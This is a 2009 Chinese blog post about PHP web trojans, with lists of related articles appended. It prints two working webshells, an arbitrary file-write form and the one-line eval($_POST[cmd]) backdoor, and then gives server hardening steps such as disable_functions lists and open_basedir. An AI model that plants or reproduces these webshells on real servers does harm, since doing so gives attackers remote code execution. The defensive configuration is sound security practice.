全世界最小的php网页木马一枚 附PHP木马的防范方法


Posted in PHP onOctober 09, 2009

php网页木马

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?>

一句话php木马
<?php eval($_POST[cmd]);?>

PHP木马的防范方法
PHP是能让你生成动态网页的工具之一。PHP网页文件被当作一般HTML网页文件来处理并且在编辑时你可以用编辑HTML的常规方法编写PHP。
PHP代表,超文本预处理器(PHP: Hypertext Preprocessor),可以从PHP官方站点(http://www.php.net)自由下载。PHP遵守GNU公共许可(GPL),在这一许可下诞生了许多流行的软件诸如Linux和Emacs。PHP在大多数Unix平台,GUN/Linux和微软Windows平台上均可以运行。怎样在Windows环境的PC机器或Unix机器上安装PHP的资料可以在PHP官方站点上找到。安装过程很简单。
PHP的另一好处就在于他的安全性,随着现在互联网的发展,网络安全越来越受重视,PHP的诞生几乎代替了ASP,因为PHP对于安全方面的设置是极为简单的不像ASP那样需要很多的步骤,和禁用很多的服务。不过再好的东西也始终会有不足,如果默认设置的PHP同意也是不堪一击,因此本文就来讲一下如何对PHP进行一些安全方面的配置,来防止脚本木马的破坏。
一、防止php木马执行webshell
打开safe_mode, 在,php.ini中设置 disable_functions= passthru,exec,shell_exec,system 二者选一即可,也可都选。
二、防止跳出web目录
首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache/htdocs ,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误: Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。
三、防止php木马读写文件目录
在php.ini中的 disable_functions= passthru,exec,shell_exec,system 后面加上php处理文件的函数,主要有 fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile 。即成为 disable_functions= passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir ,fopen,fread,fclose,fwrite,file_exists ,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile 。
ok,大功告成,php木马拿我们没辙了,遗憾的是这样的话,利用文本数据库的那些东西就都不能用了。 如果是在windos平台下搭建的apache还需要注意一点,apache默认运行是system权限,必须给apache降降权限,如下:
net user apache f**kmicrosoft /add
net localgroup users apache /del
此时建立了一个不属于任何组的用户apche,只要打开计算机管理器-服务-apache服务的属性-log on-this account,在这里填入上面所建立的账户和密码,重启apache服务即可实现apache运行在低权限下。
总结:实际上还可以通过设置各个文件夹的权限,给每一个目录建立一个单独能读写的用户,来实现安全。当前很多虚拟主机提供商的流行配置方法,不过这种方法用于防止这里就显的有点大材小用了。只要我们管理员有安全意识,相对的禁闭不用的功能就可以保证网络安全的威胁。

下面是mcafee的安全设置,防止一些网页木马生成文件等。
https://3water.com/hack/list461_1.html

PHP 相关文章推荐
PHP 的 __FILE__ 常量
Jan 15 PHP
php学习笔记 面向对象的构造与析构方法
Jun 13 PHP
简单的PHP缓存设计实现代码
Sep 30 PHP
php找出指定范围内回文数且平方根也是回文数的方法
Mar 23 PHP
使用新浪微博API的OAuth认证发布微博实例
Mar 27 PHP
PHP中Closure类的使用方法及详解
Oct 09 PHP
WordPress中制作导航菜单的PHP核心方法讲解
Dec 11 PHP
[原创]php使用strpos判断字符串中数字类型子字符串出错的解决方法
Apr 01 PHP
Redis在Laravel项目中的应用实例详解
Aug 11 PHP
PHP封装的完整分页类示例
Aug 21 PHP
实例讲解PHP中使用命名空间
Jan 27 PHP
Laravel5.0+框架邮件发送功能实现方法图文与实例详解
Apr 23 PHP
PHP 字符串分割和比较
Oct 06 #PHP
PHP parse_url 一个好用的函数
Oct 03 #PHP
php面向对象全攻略 (十七) 自动加载类
Sep 30 #PHP
php面向对象全攻略 (十六) 对象的串行化
Sep 30 #PHP
php面向对象全攻略 (十五) 多态的应用
Sep 30 #PHP
php面向对象全攻略 (十四) php5接口技术
Sep 30 #PHP
php面向对象全攻略 (十二) 抽象方法和抽象类
Sep 30 #PHP
You might like
PHP中实现Bloom Filter算法
2015/03/30 PHP
php基于自定义函数记录log日志方法
2017/07/21 PHP
JQuery自定义事件的应用 JQuery最佳实践
2010/08/01 Javascript
JavaScript.The.Good.Parts阅读笔记(二)作用域&amp;闭包&amp;减缓全局空间污染
2010/11/16 Javascript
关于JavaScript中的关联数组分析
2013/04/09 Javascript
JS中怎样判断undefined(比较不错的方法)
2014/03/27 Javascript
返回顶部按钮响应滚动且动态显示与隐藏
2014/10/14 Javascript
浅谈$(document)和$(window)的区别
2015/07/15 Javascript
原生js实现新闻列表展开/收起全文功能
2017/01/20 Javascript
基于jQuery和CSS3实现APPLE TV海报视差效果
2017/06/16 jQuery
解决bootstrap中下拉菜单点击后不关闭的问题
2018/08/10 Javascript
30分钟快速实现小程序语音识别功能
2018/11/27 Javascript
微信小程序结合mock.js实现后台模拟及调试
2019/03/28 Javascript
使用vue实现HTML页面生成图片的方法
2020/03/12 Javascript
JavaScript获取时区实现过程解析
2020/09/24 Javascript
[03:32]2014DOTA2西雅图邀请赛 CIS外卡赛赛前black专访
2014/07/09 DOTA
Python黑魔法Descriptor描述符的实例解析
2016/06/02 Python
Python绘制3D图形
2018/05/03 Python
python leetcode 字符串相乘实例详解
2018/09/03 Python
Python 通过调用接口获取公交信息的实例
2018/12/17 Python
Python异步编程之协程任务的调度操作实例分析
2020/02/01 Python
Tensorflow 模型转换 .pb convert to .lite实例
2020/02/12 Python
Scrapy爬虫文件批量运行的实现
2020/09/30 Python
纯css3实现照片墙效果
2014/12/26 HTML / CSS
比利时买床:Beter Bed
2017/12/06 全球购物
俄罗斯Sportmarket体育在线商店:用于旅游和户外活动
2019/11/12 全球购物
kfc实习自我鉴定
2013/12/14 职场文书
家长通知书教师评语
2014/04/17 职场文书
社区关爱留守儿童活动方案
2014/08/22 职场文书
个人汇报材料范文
2014/12/30 职场文书
写给老师的保证书
2015/05/09 职场文书
民事起诉状范文
2015/05/19 职场文书
保险公司2016开门红口号集锦
2015/12/24 职场文书
高效笔记技巧分享:学会这些让你不再困扰
2019/09/04 职场文书
Java基础-封装和继承
2021/07/02 Java/Android
OpenStack虚拟机快照和增量备份实现方法
2022/04/04 Servers